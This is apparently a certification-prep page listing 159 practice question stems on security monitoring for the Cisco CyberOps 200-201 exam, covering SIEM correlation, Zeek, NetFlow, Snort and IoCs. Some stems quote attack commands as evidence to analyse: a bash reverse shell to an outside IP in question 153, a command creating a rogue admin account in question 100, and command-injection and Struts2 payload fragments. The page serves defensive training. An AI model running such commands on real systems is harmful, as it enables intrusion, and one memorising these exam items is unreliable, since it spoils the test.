Be able to select the right data source and log, write correlation logic that thresholds repeated events over time, and distinguish true IoCs from benign artifacts. The most important thing: correlate multiple events, not single alerts, to confirm attacks like brute force.
Start practicing
Security Monitoring — choose a session length
Free · No account required
Domain overview
Security Monitoring is 25% of the Cisco CyberOps Associate 200-201 exam. It covers collecting and analyzing telemetry with SIEM correlation rules, NetFlow, and Cisco tools like Firepower, Stealthwatch, and Umbrella, plus interpreting logs from Zeek, syslog, and Windows events to detect intrusions and validate indicators of compromise.
Exam objectives
Writing SIEM correlation rules that aggregate repeated failed logins into brute-force alerts
Reading Zeek http.log fields: HTTP methods, URIs, status codes, user agents
Using NetFlow and Cisco Stealthwatch to spot anomalous traffic flows and exfiltration
Recognizing valid IoCs such as file hashes, malicious domains, and IP addresses
Treating a single failed login as a brute-force indicator instead of correlating many attempts within a time window
Confusing Zeek log types, for example expecting HTTP details in conn.log rather than http.log
Assuming any suspicious-looking artifact is an IoC without verifying it is actionable and observable evidence
Click any question to see the full explanation and answer options, or start a focused practice session above.
An analyst is monitoring network traffic and observes a large number of TCP SYN packets sent to a single host on various ports with no corresponding SYN-ACK replies. This behavior is most indicative of which type of attack?
2A security engineer is setting up a Snort rule to detect FTP traffic where the source IP is not from the internal network. Which Snort rule header correctly specifies the action, protocol, source, and destination?
3An analyst is examining a firewall log entry: '2023-10-25 14:30:00 ACTION=DENY SRC=10.0.0.5 DST=203.0.113.50 PROTO=TCP SPT=445 DPT=445'. Which statement best describes this event?
4A SOC analyst needs to create a SIEM correlation rule to detect a brute force attack against SSH on a server. Which of the following would be the most effective rule logic?
5A security analyst is reviewing Zeek connection logs and sees the following entry: '192.168.1.10:12345 > 10.0.0.1:80 (tcp) duration 0.001 sec, service http, bytes 60, state S0'. Based on the state 'S0', what does this indicate about the connection?
6An analyst receives an IDS alert with signature name 'ET TROJAN Win32.Zeus Checkin' and severity 'high'. The alert shows source IP 192.168.1.50 and destination IP 198.51.100.20 on port 443. Which action should the analyst take FIRST?
7An analyst is reviewing a web server log and sees the following entry: '192.168.1.1 - - [25/Oct/2023:10:15:30 -0400] "GET /admin/index.php?cmd=id HTTP/1.1" 200 1532 "-" "Mozilla/5.0"'. What potential attack does this log entry suggest?
8A SOC analyst is tuning IDS signatures and notices that a particular signature triggers frequently on legitimate traffic from a specific internal application. The signature has a high false positive rate. What is the best action to take?
9A security analyst is investigating a potential data exfiltration incident. Which TWO of the following are common indicators that data exfiltration may be occurring over DNS? (Choose two.)
10Which TWO of the following are examples of Indicators of Compromise (IoCs) used in network security monitoring? (Choose two.)
11During a security monitoring review, an analyst notices an unusual amount of traffic on port 445. Which protocol is most likely associated with this port?
12A security analyst is investigating a potential brute force attack. Which SIEM correlation rule would best detect this activity?
13An analyst uses Wireshark to examine network traffic and wants to see only packets that contain the string 'password'. Which type of filter should be applied?
14In a Zeek/Bro log, an analyst observes a connection with 'service' field set to 'dns' and 'query' field containing a long, random-looking subdomain. This could be indicative of which type of activity?
15Which OSI layer is responsible for logical addressing and routing, and is commonly targeted by IP spoofing attacks?
16A security analyst is reviewing firewall logs and notices a rule that denies traffic from source IP 10.0.0.5 to destination port 3389. What service is being blocked?
17A SOC analyst is analyzing NetFlow data and notices a sudden spike in outbound traffic from a single internal host to an external IP address during non-business hours. The traffic volume is significantly higher than the baseline. Which suspicion is most likely?
18Which log type would an analyst examine to view details about HTTP methods (GET, POST), response codes, and user-agent strings?
19An IDS/IPS alert shows a signature named 'ET POLICY Outgoing HTTP Request with Suspicious User-Agent' with severity high. What is the most likely next step for an analyst?
20During an incident response, an analyst extracts a file from network traffic using Zeek's file analysis feature. The file has a SHA-256 hash that matches a known malware indicator. Which type of IoC is this?
21An analyst needs to establish a normal traffic pattern baseline for the network. Which activity is most appropriate for this purpose?
22A security analyst is examining system logs for signs of privilege escalation. Which THREE events are most relevant to detect such activity?
23An analyst is tuning Snort IDS rules and wants to reduce false positives. Which TWO rule options can be adjusted to decrease sensitivity?
24A security analyst is monitoring network traffic and notices a high volume of TCP SYN packets sent to various ports on a single host. Which type of attack is most likely occurring?
25A SIEM correlation rule triggers an alert when more than 10 failed login attempts from the same source IP occur within 60 seconds. Which attack is this rule designed to detect?
26An analyst captures traffic and sees a high number of DNS queries for random subdomains under a single domain, all returning NXDOMAIN. This pattern is typical of which malicious activity?
27Which protocol and port pair is commonly used for secure web traffic?
28A firewall log shows a connection from internal IP 192.168.1.100 to external IP 203.0.113.5 on port 443 with action 'deny'. What does this indicate?
29A Zeek connection log shows a high number of connections from a single internal IP to many different external IPs on port 25, with small payload sizes. Which behavior is most likely indicated?
30Which OSI layer is responsible for logical addressing and routing?
31An analyst sees a Snort alert with the message 'ET POLICY Outbound connection to known malicious IP'. What does this indicate?
32Which log source would provide the most detailed information about HTTP requests, including URLs and user agents?
33A NetFlow report shows that host 10.0.0.5 has sent 1 GB of data to external IP 198.51.100.10 over port 443 in the last hour, while other hosts average 100 MB. This anomaly is most indicative of:
34Which of the following is a valid indicator of compromise (IoC)?
35A security analyst is reviewing logs to identify a potential brute force attack. Which TWO log entries would be most suspicious? (Choose TWO.)
36During packet analysis in Wireshark, which THREE findings are indicators of potential malicious activity? (Choose THREE.)
37A security analyst is tuning a SIEM to detect lateral movement. Which THREE log sources would provide the most useful data for this purpose? (Choose THREE.)
38Which OSI layer is associated with protocols such as HTTP, FTP, and SMTP, and is commonly targeted by application-layer attacks?
39A firewall log shows repeated denied packets from IP 10.0.0.5 to destination 192.168.1.10 on port 22. What is the most likely attack?
40An analyst suspects data exfiltration via DNS. Which log type would provide the most relevant information to confirm this?
41A security analyst observes a NetFlow record showing a single internal IP communicating with many external IPs on port 445 within seconds. This pattern is indicative of:
42In Zeek (Bro), which log file would an analyst examine to identify HTTP methods, URIs, and response codes from web traffic?
43Which port is used by RDP (Remote Desktop Protocol) and is a common target for brute force attacks?
44A SIEM correlation rule triggers when more than 10 failed login attempts from a single source IP occur within 1 minute. This rule is designed to detect:
45An analyst finds a YARA rule that matches a file containing the string 'MZ' at offset 0 and includes 'CreateRemoteThread'. This rule likely identifies:
46Which protocol and port combination is used by SNMP for receiving traps?
47An analyst uses 'tshark -r capture.pcap -Y "http.request.method == POST"' to display only HTTP POST requests. This is an example of a:
48Which TWO of the following are functions of a SIEM system in security monitoring?
49A security analyst is monitoring network traffic and notices a large number of TCP SYN packets being sent to a single host on various ports. Which type of attack is most likely occurring?
50A network analyst notices that a host is sending a large volume of traffic to an external IP address on port 443 during non-business hours. The traffic volume is significantly higher than the established baseline. Which type of data exfiltration technique should be suspected?
51A security analyst is reviewing Snort IDS alerts and sees the following rule triggered: alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg:'Possible SQL Injection'; content:'UNION'; nocase; sid:1000001;). Which action will Snort take when it detects matching traffic?
52Which protocol and port combination is commonly used for secure remote administration of network devices?
53A SIEM correlation rule is configured to alert when there are 10 failed login attempts from the same source IP within 1 minute. An analyst receives an alert for source IP 10.0.0.5. Which type of attack is most likely being detected?
54An organization uses Zeek for network monitoring. An analyst wants to extract files transferred over HTTP from network traffic. Which Zeek script or functionality should they use?
55Which of the following is an example of an Indicator of Compromise (IoC)?
56A network administrator is creating a baseline for normal traffic patterns. Which of the following should be considered typical for a web server during business hours?
57A SOC analyst is reviewing a NetFlow record and sees that a single internal IP has communicated with multiple external IPs on port 445 (SMB) within a short time frame. Which type of activity is most likely indicated?
58Which component of a SIEM is responsible for converting log data from various sources into a standard format?
59A security analyst is investigating a potential data exfiltration incident. Which TWO of the following network behaviors are indicators of data exfiltration?
60A SOC analyst is analyzing logs from multiple sources. Which THREE log types are most useful for detecting a brute force attack against a web application?
61A network analyst is creating a baseline for normal network traffic. Which TWO metrics should be included to establish a baseline?
62An analyst is monitoring network traffic and sees a large number of TCP SYN packets sent to various ports on a single host from the same source IP. Which type of attack is most likely occurring?
63A security analyst is reviewing firewall logs and notices a high number of denied outbound connections from an internal workstation to various external IP addresses on port 445 (SMB). What is the most likely explanation for this activity?
64A NetFlow analysis shows that a single internal IP sent 10 GB of data to an external IP within one hour, whereas the baseline for that host is typically 100 MB per day. Which type of activity does this indicate?
65An analyst is configuring a Snort rule to detect a known exploit targeting Apache web servers. The exploit sends a malicious HTTP POST request with a long User-Agent string. Which Snort rule header and options are most appropriate?
66A SIEM correlation rule is designed to detect a brute-force attack. The rule triggers when an event includes 10 or more failed logins from the same source IP within 1 minute. An analyst sees an alert for 12 failed logins from IP 10.0.0.1 in 2 minutes. Why did the rule not trigger?
67An analyst is investigating a potential data exfiltration via DNS. In Zeek DNS logs, the analyst sees many queries for subdomains like 'a1b2c3.malicious.com', 'd4e5f6.malicious.com' etc. from an internal host. Which technique is likely being used?
68In Wireshark, an analyst follows a TCP stream and sees plaintext usernames and passwords. Which protocol is likely in use?
69An analyst is reviewing IDS alerts and sees an alert with signature name 'ET POLICY Suspicious inbound to MySQL port 3306'. The source IP is external and destination is an internal database server. What is the best immediate action?
70Which protocol is used by SNMP to send traps from network devices to the management station?
71An analyst is investigating a potential compromise using Indicators of Compromise (IoCs). Which TWO of the following are valid types of IoCs?
72A SOC analyst is tuning a SIEM correlation rule to detect port scanning. The rule should generate an alert when a single source IP connects to many different destination ports on multiple hosts within a short time. Which THREE conditions should be included in the rule?
73A security analyst is creating a network baseline for normal traffic patterns. Which TWO metrics should be included to detect anomalies?
74A security analyst is reviewing a Wireshark capture and notices a large number of TCP SYN packets sent to multiple ports on a single host from the same source IP. Which type of network activity is most likely being observed?
75A security analyst is using NetFlow data to investigate a potential data exfiltration incident. Which NetFlow metric is most useful for identifying large volumes of data being transferred to an external IP address?
76During a security assessment, a SOC analyst notices an IDS/IPS alert with a severity of 'High' for a signature named 'ET TROJAN Win32.Vobfus Checkin'. The alert shows source IP 10.0.0.5 and destination IP 203.0.113.50 on port 443. What is the most likely interpretation of this alert?
77A security analyst is investigating an alert from a Windows system log that shows multiple failed logon attempts for the same user account within a short period, followed by a successful logon. Which type of attack does this pattern suggest?
78A security analyst is examining web server logs and finds an entry with method 'POST', URL '/login.php', response code '200', and user-agent 'Mozilla/5.0'. The log shows 100 similar entries from the same IP within 5 seconds. What is the most likely activity?
79A network baseline shows that a server typically sends 1-2 MB of data per hour to external IPs. Suddenly, the server sends 50 MB of data to an IP in a foreign country within 10 minutes. The traffic is encrypted. Which monitoring tool would best confirm data exfiltration?
80A security analyst is using a SIEM to create a correlation rule that triggers when more than 10 failed logins are detected from the same source IP within 1 minute. This rule is designed to detect which type of attack?
81A SOC analyst reviews a firewall log with the following entry: action=deny, source IP=192.168.1.100, destination IP=10.0.0.1, destination port=22. The analyst knows that 10.0.0.1 is an SSH server. What does this log entry indicate?
82An analyst receives a YARA rule that includes the string 'MZ' at the beginning of a file. What does this indicator typically help identify?
83In the OSI model, which layer is primarily targeted by a SYN flood attack?
84A security analyst is using Zeek to analyze network traffic. Which Zeek log would be most useful for identifying HTTP requests to a known malicious domain?
85An analyst suspects a host is communicating with a command-and-control server using DNS tunneling. Which THREE network traffic patterns would support this hypothesis?
86A security analyst is analyzing a PCAP file in Wireshark and wants to isolate all HTTPS traffic. Which display filter should the analyst use?
87Which OSI layer is targeted by a TCP SYN flood attack?
88A SIEM correlation rule triggers when it detects more than 10 failed login attempts from the same source IP within 1 minute. Which type of attack is this rule designed to detect?
89An analyst is examining a YARA rule that contains the condition: 'uint16(0) == 0x5a4d and filesize < 500KB'. What type of file is this rule targeting?
90A SOC analyst is investigating a potential data exfiltration incident. Which TWO indicators from NetFlow/IPFIX analysis would most strongly suggest data exfiltration?
91An analyst is reviewing web server logs and sees the following entries: 'GET /admin/login.php HTTP/1.1' returning 404, followed by 'GET /admin/login.html' returning 404, then 'GET /admin/login.asp' returning 200. Which TWO observations are most relevant?
92Which THREE of the following are common Indicators of Compromise (IoCs) used in threat intelligence?
93A security analyst is analyzing system logs and notices multiple failed authentication events followed by a successful login from the same user account, and then a privilege escalation event. Which THREE events should be correlated to detect a potential attack?
94An analyst is using Zeek to monitor network traffic. Which THREE types of logs can Zeek generate to provide visibility into application-layer activity?
95A SOC analyst notices that a workstation is generating NetFlow records showing repeated outbound connections to 203.0.113.45 on port 443 at regular 60-second intervals, with each flow transferring approximately 4 KB. The destination IP has no reputation data. Which analysis approach would best determine whether this traffic represents C2 beaconing?
96A SOC analyst is reviewing Cisco Firepower intrusion event logs and notices a signature that fired with the message 'OS-COMMAND' on traffic destined to an internal web server on TCP port 80. Which type of activity does this signature most likely indicate?
97A network security analyst is examining a packet capture in Wireshark and notices a series of TCP packets with the PSH, ACK flags set, and a payload containing the string 'cmd.exe /c whoami'. The packets are destined to port 445 on an internal server. Which type of malicious activity is most likely indicated?
98A SOC analyst is reviewing Cisco Firepower Intrusion Event logs and notices a high volume of alerts for the signature 'SERVER-WEBAPP Apache Struts2 remote code execution attempt' coming from a single internal host to external web servers. The analyst needs to determine if this is a true positive or a false positive. Which of the following actions would BEST help make that determination?
99A security analyst is investigating a potential security incident and needs to correlate events across multiple data sources. Which two Cisco CyberOps tools or features would provide network flow data and intrusion event details respectively? (Choose two.)
100A security analyst is examining a suspicious executable found on a compromised host. The analyst runs the command 'strings malware.exe' and sees the string 'cmd.exe /c net user hacker P@ssw0rd /add'. What is the most likely intent of this command?
101A security analyst is examining a suspicious executable and wants to extract readable strings to identify potential C2 domains or file paths. The analyst has the file on a Windows workstation and needs to use a built-in or commonly available tool. Which approach is most appropriate?
102An analyst is investigating a potential security incident and reviews the Cisco ASA firewall logs. The logs show the following entry: 'Deny tcp src outside:203.0.113.5/443 dst inside:10.1.1.10/3389'. Which of the following does this log entry indicate?
103A Cisco Firepower analyst inspects an inline intrusion policy event where the packet was dropped but only a partial payload was captured. The analyst wants to confirm whether the attack was successful on the target host. Which data source should be correlated with the Firepower event?
104A security analyst is examining a suspicious file and wants to determine its reputation and threat score. Which Cisco security solution should the analyst use to query the file's SHA-256 hash and get a verdict?
105A SOC analyst is reviewing Cisco Firepower and NetFlow records for a suspected lateral movement campaign inside the corporate network. Which TWO monitoring observations most strongly support the hypothesis that an attacker is moving laterally using SMB? (Choose two.)
106A SOC analyst is reviewing DNS logs and suspects that a host is communicating with a domain generation algorithm (DGA) used by malware. Which TWO characteristics in the DNS logs would most strongly support this suspicion? (Choose two.)
107A SOC analyst is investigating a potential security incident involving a Windows workstation. The analyst has collected network traffic and host logs. Which two artifacts would provide the most direct evidence of a Pass-the-Hash attack? (Choose two.)
108A security analyst is examining a suspicious file and calculates its SHA-256 hash. The analyst then queries Cisco Talos Intelligence for the hash. The result shows that the file is known malware with a detection name of 'Trojan.GenericKD.123456'. Which of the following does this result indicate?
109A threat hunter reviews Cisco Umbrella DNS logs and notices repeated queries for randomly generated subdomains under a single parent domain, each resolved by a different authoritative name server. The hunter suspects DNS tunneling. Which additional artifact would most directly confirm command-and-control activity rather than legitimate DNS behavior?
110A network engineer is deploying a Cisco Next-Generation IPS (NGIPS) in inline mode. The security team wants to ensure that the device can block malicious traffic while also providing contextual information about the attack. Which of the following Cisco NGIPS features provides detailed information about the attack and the target, including vulnerability mapping?
111A security analyst is reviewing firewall logs and notices that a workstation is making outbound connections to multiple external IP addresses on port 22 (SSH). The workstation is not authorized to use SSH for external connections. Which type of activity does this most likely indicate?
112A security analyst is reviewing a packet capture in Wireshark and notices a series of DNS queries for randomly generated domain names such as 'a1b2c3d4e5.com', 'f6g7h8i9j0.net', and 'k1l2m3n4o5.org'. The queries are sent to multiple different DNS servers. Which type of malicious activity does this pattern most likely indicate?
113A network security analyst is reviewing traffic logs and notices a series of connections from an internal host to a known command-and-control (C2) server. The connections occur every 5 minutes and are small in size. Which of the following is the MOST likely explanation for this traffic pattern?
114A SOC analyst is triaging a Cisco Stealthwatch alarm that shows a workstation uploading 4 GB to an external IP address at 02:00, outside normal business hours. The destination has no prior reputation data. Which action should the analyst take first according to the incident response process?
115A SOC analyst is reviewing network telemetry from Cisco Stealthwatch and notices a host inside the corporate network initiating repeated outbound connections to a single external IP address. Each connection is short-lived (less than 5 seconds) and occurs at irregular intervals, with varying destination ports. The analyst suspects command-and-control activity. Which approach would best confirm this suspicion using available telemetry?
116A SOC analyst monitoring Cisco Stealthwatch Enterprise notices a host inside the network is receiving NetFlow records showing repeated inbound connections on TCP port 3389 from multiple external IP addresses over a short period. The host is a workstation, not a server. Which action should the analyst take first?
117An analyst reviews Cisco ASA syslog messages and sees repeated entries with message ID 106023 denied inbound TCP from an external address to an internal web server on port 443. The web server is expected to receive inbound HTTPS traffic. What should the analyst investigate?
118A security analyst is examining a PCAP and observes a TCP stream where the client sends a single packet with the PSH, ACK flags set, and the server responds with a single packet with the RST, ACK flags set. The client then sends no further packets. What is the most likely explanation for this behavior?
119A Cisco CyberOps analyst is reviewing a network security monitoring console and must determine which TWO data sources are most useful for detecting lateral movement by an attacker who has already compromised a workstation. (Choose two.)
120A SOC analyst reviewing Cisco Firepower intrusion events notices that a single internal host generated hundreds of alerts for the same signature within a five-minute window, each with a different destination port on the same external IP. The analyst wants to reduce noise before escalating. Which action should the analyst take first?
121An analyst is reviewing Cisco Firepower intrusion events and sees an alert for a TCP connection to an internal web server on port 80 with the rule message 'SERVER-WEBAPP Apache Struts2 remote code execution attempt'. The packet payload contains the string 'Content-Type: %{(#_='multipart/form-data')'. The server is running Apache Struts2 version 2.3.15. What should the analyst do next?
122An analyst is reviewing DNS logs and sees repeated queries from an internal workstation to randomly generated subdomains of a single domain, such as a1b2c3.example.com, d4e5f6.example.com, and so on. The responses are consistently NXDOMAIN. Which technique is most consistent with this pattern?
123While analyzing a packet capture in Wireshark, an analyst observes a series of TCP packets with the PSH, ACK flags set and a payload containing the string 'cmd.exe /c whoami'. The destination port is 4444. Which type of activity is most likely indicated?
124A junior analyst is asked to identify which type of log would best show whether a Windows workstation attempted to authenticate to a file share on another server. Which log source should the analyst consult?
125A SOC analyst is investigating a Windows workstation that has been exhibiting unusual outbound connections. Reviewing Sysmon Event ID 3 (Network Connection) logs, the analyst notices a process named svchost.exe with a parent process of cmd.exe initiating connections to an external IP on port 4444. On a healthy system, svchost.exe is normally spawned by services.exe. Which conclusion is most strongly supported by these log entries?
126A network analyst is examining a packet capture and notices a series of TCP packets where the client sends a SYN, the server responds with SYN-ACK, and the client never sends an ACK. The client repeats this for many destination ports on the same server. Which conclusion is most accurate?
127A network security analyst is reviewing NetFlow records from a perimeter router and observes that an internal server at 172.16.5.20 has transferred approximately 4.5 GB to an external IP address in country X over the past three hours, all during non-business hours. The destination IP has no prior communication history with the organization and the traffic uses port 443. Which analysis approach would best confirm whether this represents data exfiltration?
128A SOC analyst is reviewing proxy logs and wants to identify indicators of potential data exfiltration over HTTP. Which two patterns should the analyst treat as suspicious? (Choose two.)
129A SOC analyst is reviewing NetFlow records exported from the border router. A single internal workstation is generating a steady stream of outbound sessions to dozens of unique external IP addresses on TCP port 443, each lasting only a few seconds, every day at 02:00. No corresponding firewall denies are logged. Which security monitoring conclusion is most appropriate?
130A SOC analyst is correlating multiple data sources after a suspected web application compromise on an internet-facing server. The analyst has access to web server logs, firewall logs, and endpoint detection and response (EDR) telemetry. Which TWO log sources or record types would most directly help identify the initial exploitation attempt and the subsequent post-exploitation activity? (Choose two.)
131An analyst is triaging a host that antivirus flagged for a file named svchost.exe running from C:\Users\Public\Downloads. The file has a valid digital signature issued to a legitimate software publisher, and the hash matches a known-good installer component. The process is making outbound SMB connections to several internal servers. Which action best reflects sound security monitoring practice?
132A network security analyst is reviewing firewall logs and sees repeated denied inbound connection attempts from various external IP addresses to TCP port 3389 on several internal hosts. Which type of activity does this most likely represent?
133A Cisco Firepower analyst notices repeated syslog messages from an ASA firewall showing TCP connections to 203.0.113.55:4444 that are reset immediately after the three-way handshake. The source hosts are internal workstations running an outdated browser plugin. Which security monitoring data source would best confirm whether these workstations established a command-and-control channel?
134A junior SOC analyst receives an alert indicating that a workstation attempted to resolve a domain associated with a known malware family. The analyst wants to determine whether the workstation actually connected to the malicious domain or if the resolution attempt was blocked. Which data source would most directly answer this question?
135An analyst is investigating a potential data exfiltration incident. The only available data is NetFlow records from Cisco routers. Which NetFlow field would be most useful to identify large outbound transfers to an unusual external host?
136A junior analyst is asked to determine which log source would best reveal an attacker attempting to authenticate to a Windows file server with stolen credentials over the network. Which source should the analyst consult first?
137A threat hunter reviews Cisco Stealthwatch flow data and sees an internal server sending periodic 300-byte outbound flows to an external IP every 60 seconds, with consistent packet sizes and no matching inbound response beyond TCP acknowledgments. The server's DNS queries for that IP resolve through a newly registered domain. Which monitoring approach best characterizes this activity as beaconing rather than normal application traffic?
138A security analyst is reviewing NetFlow records exported from a Cisco router at the internet edge. During a suspected ransomware staging window, a single internal host shows a sustained outbound flow to one external IP on TCP 443 with 4.2 GB transferred over 40 minutes, while the host's normal baseline for that destination is under 5 MB per day. No corresponding proxy log entry exists for this session. Which conclusion is best supported by these records?
139A SOC analyst is reviewing NetFlow records exported from a border router and notices a single internal host initiating outbound connections to more than 300 distinct external IP addresses on TCP port 443 within a five-minute window, with each flow carrying only a few hundred bytes. Which security monitoring conclusion is best supported by this evidence?
140A SOC analyst is reviewing firewall logs and sees repeated outbound connections from an internal server to an external IP on TCP port 443, but the traffic is not TLS. Packet capture shows a custom binary protocol with periodic small keepalives. Which type of malicious activity is most consistent with these findings?
141A SOC receives a threat intelligence feed indicating that a specific SHA-256 hash belongs to a trojan. An analyst searches the endpoint telemetry and finds no process with that hash, but the file name appears in several temporary directories. Which explanation best accounts for this result?
142An analyst is tuning a Cisco Firepower intrusion policy. A rule fires repeatedly with the message 'MALWARE-CNC Outbound connection to known malicious domain' against a marketing workstation. Packet capture shows the workstation resolving and connecting to a domain that the threat intelligence feed lists, but the endpoint shows no malicious process, no persistence, and the user states they clicked a link in a phishing email an hour earlier. Which action best reflects sound incident handling at this stage?
143A SOC analyst is tuning Cisco Firepower intrusion policies and reviewing alert metadata to prioritize response. Which TWO alert attributes most directly indicate that a detected event represents a successful compromise rather than a blocked attempt? (Choose two.)
144An analyst is triaging an alert generated by Cisco Secure Network Analytics (Stealthwatch) showing a host inside the network communicating with a known command-and-control IP. The analyst wants to determine whether the communication has already resulted in data theft. Which additional telemetry source would provide the most direct evidence of successful exfiltration?
145An analyst is reviewing a Windows event log and sees Event ID 4625 repeated many times for the same user account from different source workstations within a short period. Which activity does this most likely indicate?
146A security analyst is reviewing Sysmon telemetry from a workstation that may be compromised. Which TWO event types should the analyst correlate first to identify suspicious process execution and persistence? (Choose two.)
147A SOC analyst receives an alert that a user account successfully authenticated to the VPN from two geographically distant locations within four minutes. Both sessions remain active. The identity team confirms the user is traveling and has only one device. Which monitoring conclusion is most appropriate?
148A security analyst is correlating network and endpoint telemetry to detect a host infected with malware that is attempting to establish persistence and communicate externally. Which TWO artifacts would best support this investigation? (Choose two.)
149A network security analyst is configuring a SPAN session on a Cisco switch so that a Cisco Firepower sensor can inspect traffic between the internal user VLAN and the internet-facing router. The switch has a single physical uplink carrying that traffic. Which configuration goal must the analyst keep in mind to ensure the sensor receives complete sessions?
150An analyst is correlating telemetry after a suspected Kerberoasting attack against an Active Directory environment. Which two artifacts, when found together, most strongly support that the attack succeeded in obtaining crackable service ticket material? (Choose two.)
151During incident response, an analyst notices that a compromised host is making outbound SMB connections to several internal servers on TCP port 445 using the same domain user account within minutes. Which activity is most likely occurring?
152A SOC analyst is correlating events in the SIEM after an alert fired for suspicious PowerShell execution on a workstation. The analyst wants to identify additional evidence that would support a ransomware pre-encryption hypothesis. Which two telemetry findings would most strongly support that hypothesis? (Choose two.)
153An analyst investigates a Linux web server and finds a bash process spawned by the Apache user, with its parent process being httpd. The bash process has an outbound connection to an external IP on port 443, and the server's audit log shows the command 'bash -i >& /dev/tcp/198.51.100.22/443 0>&1'. Which security monitoring technique most reliably detects this specific attack pattern across the environment?
154A network security analyst reviews a packet capture from a compromised host and sees repeated outbound DNS queries for long, random-looking subdomains such as 'a3f9c2b81e7d4.example-cdn.net', each followed by a small response and no subsequent connection to the returned address. Which interpretation is most accurate?
155During incident response, an analyst is collecting volatile evidence from a compromised Linux server that is still running. The team wants to preserve the current state of active network connections and running processes before any remediation. Which action best preserves this volatile data in a forensically sound manner?
156A security analyst is using Cisco Umbrella and notices a high volume of DNS queries from a single internal host to randomly generated domain names that do not resolve. The queries are for domains like 'a1b2c3d4.com', 'e5f6g7h8.net', etc. What type of malicious activity is most likely occurring?
157A Cisco Stealthwatch analyst notices a host on the internal network is sending periodic DNS queries to a single external domain with subdomains that are long, random-looking strings (e.g., a8f3k2j9d0x1.example.com). The queries occur every 60 seconds, and the responses are consistently NXDOMAIN. Which type of malicious activity does this pattern most strongly indicate?
158A security analyst is examining a Cisco Umbrella Investigate report for a domain that has been flagged as malicious. The report shows a high 'security score' and lists multiple categories including 'Malware' and 'Command and Control'. Which action should the analyst take first?
159A network security analyst is reviewing NetFlow records from a Cisco router and notices a large number of flows from a single internal host to many external IP addresses on port 445. The flows are short, with small packet counts, and occur within a few minutes. Which type of activity is most likely occurring?
Be able to select the right data source and log, write correlation logic that thresholds repeated events over time, and distinguish true IoCs from benign artifacts. The most important thing: correlate multiple events, not single alerts, to confirm attacks like brute force.
The Courseiva 200-201 question bank contains 159 questions in the Security Monitoring domain, covering the 25% of the exam attributed to this domain in the official Cisco blueprint. Click any question to see the full explanation and answer breakdown.
Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.
Yes — the session launcher on this page draws questions exclusively from the Security Monitoring domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.
Save your results, see per-domain analytics, and get readiness scores — free, for every certification.
Sign Up FreeFree forever · Every certification included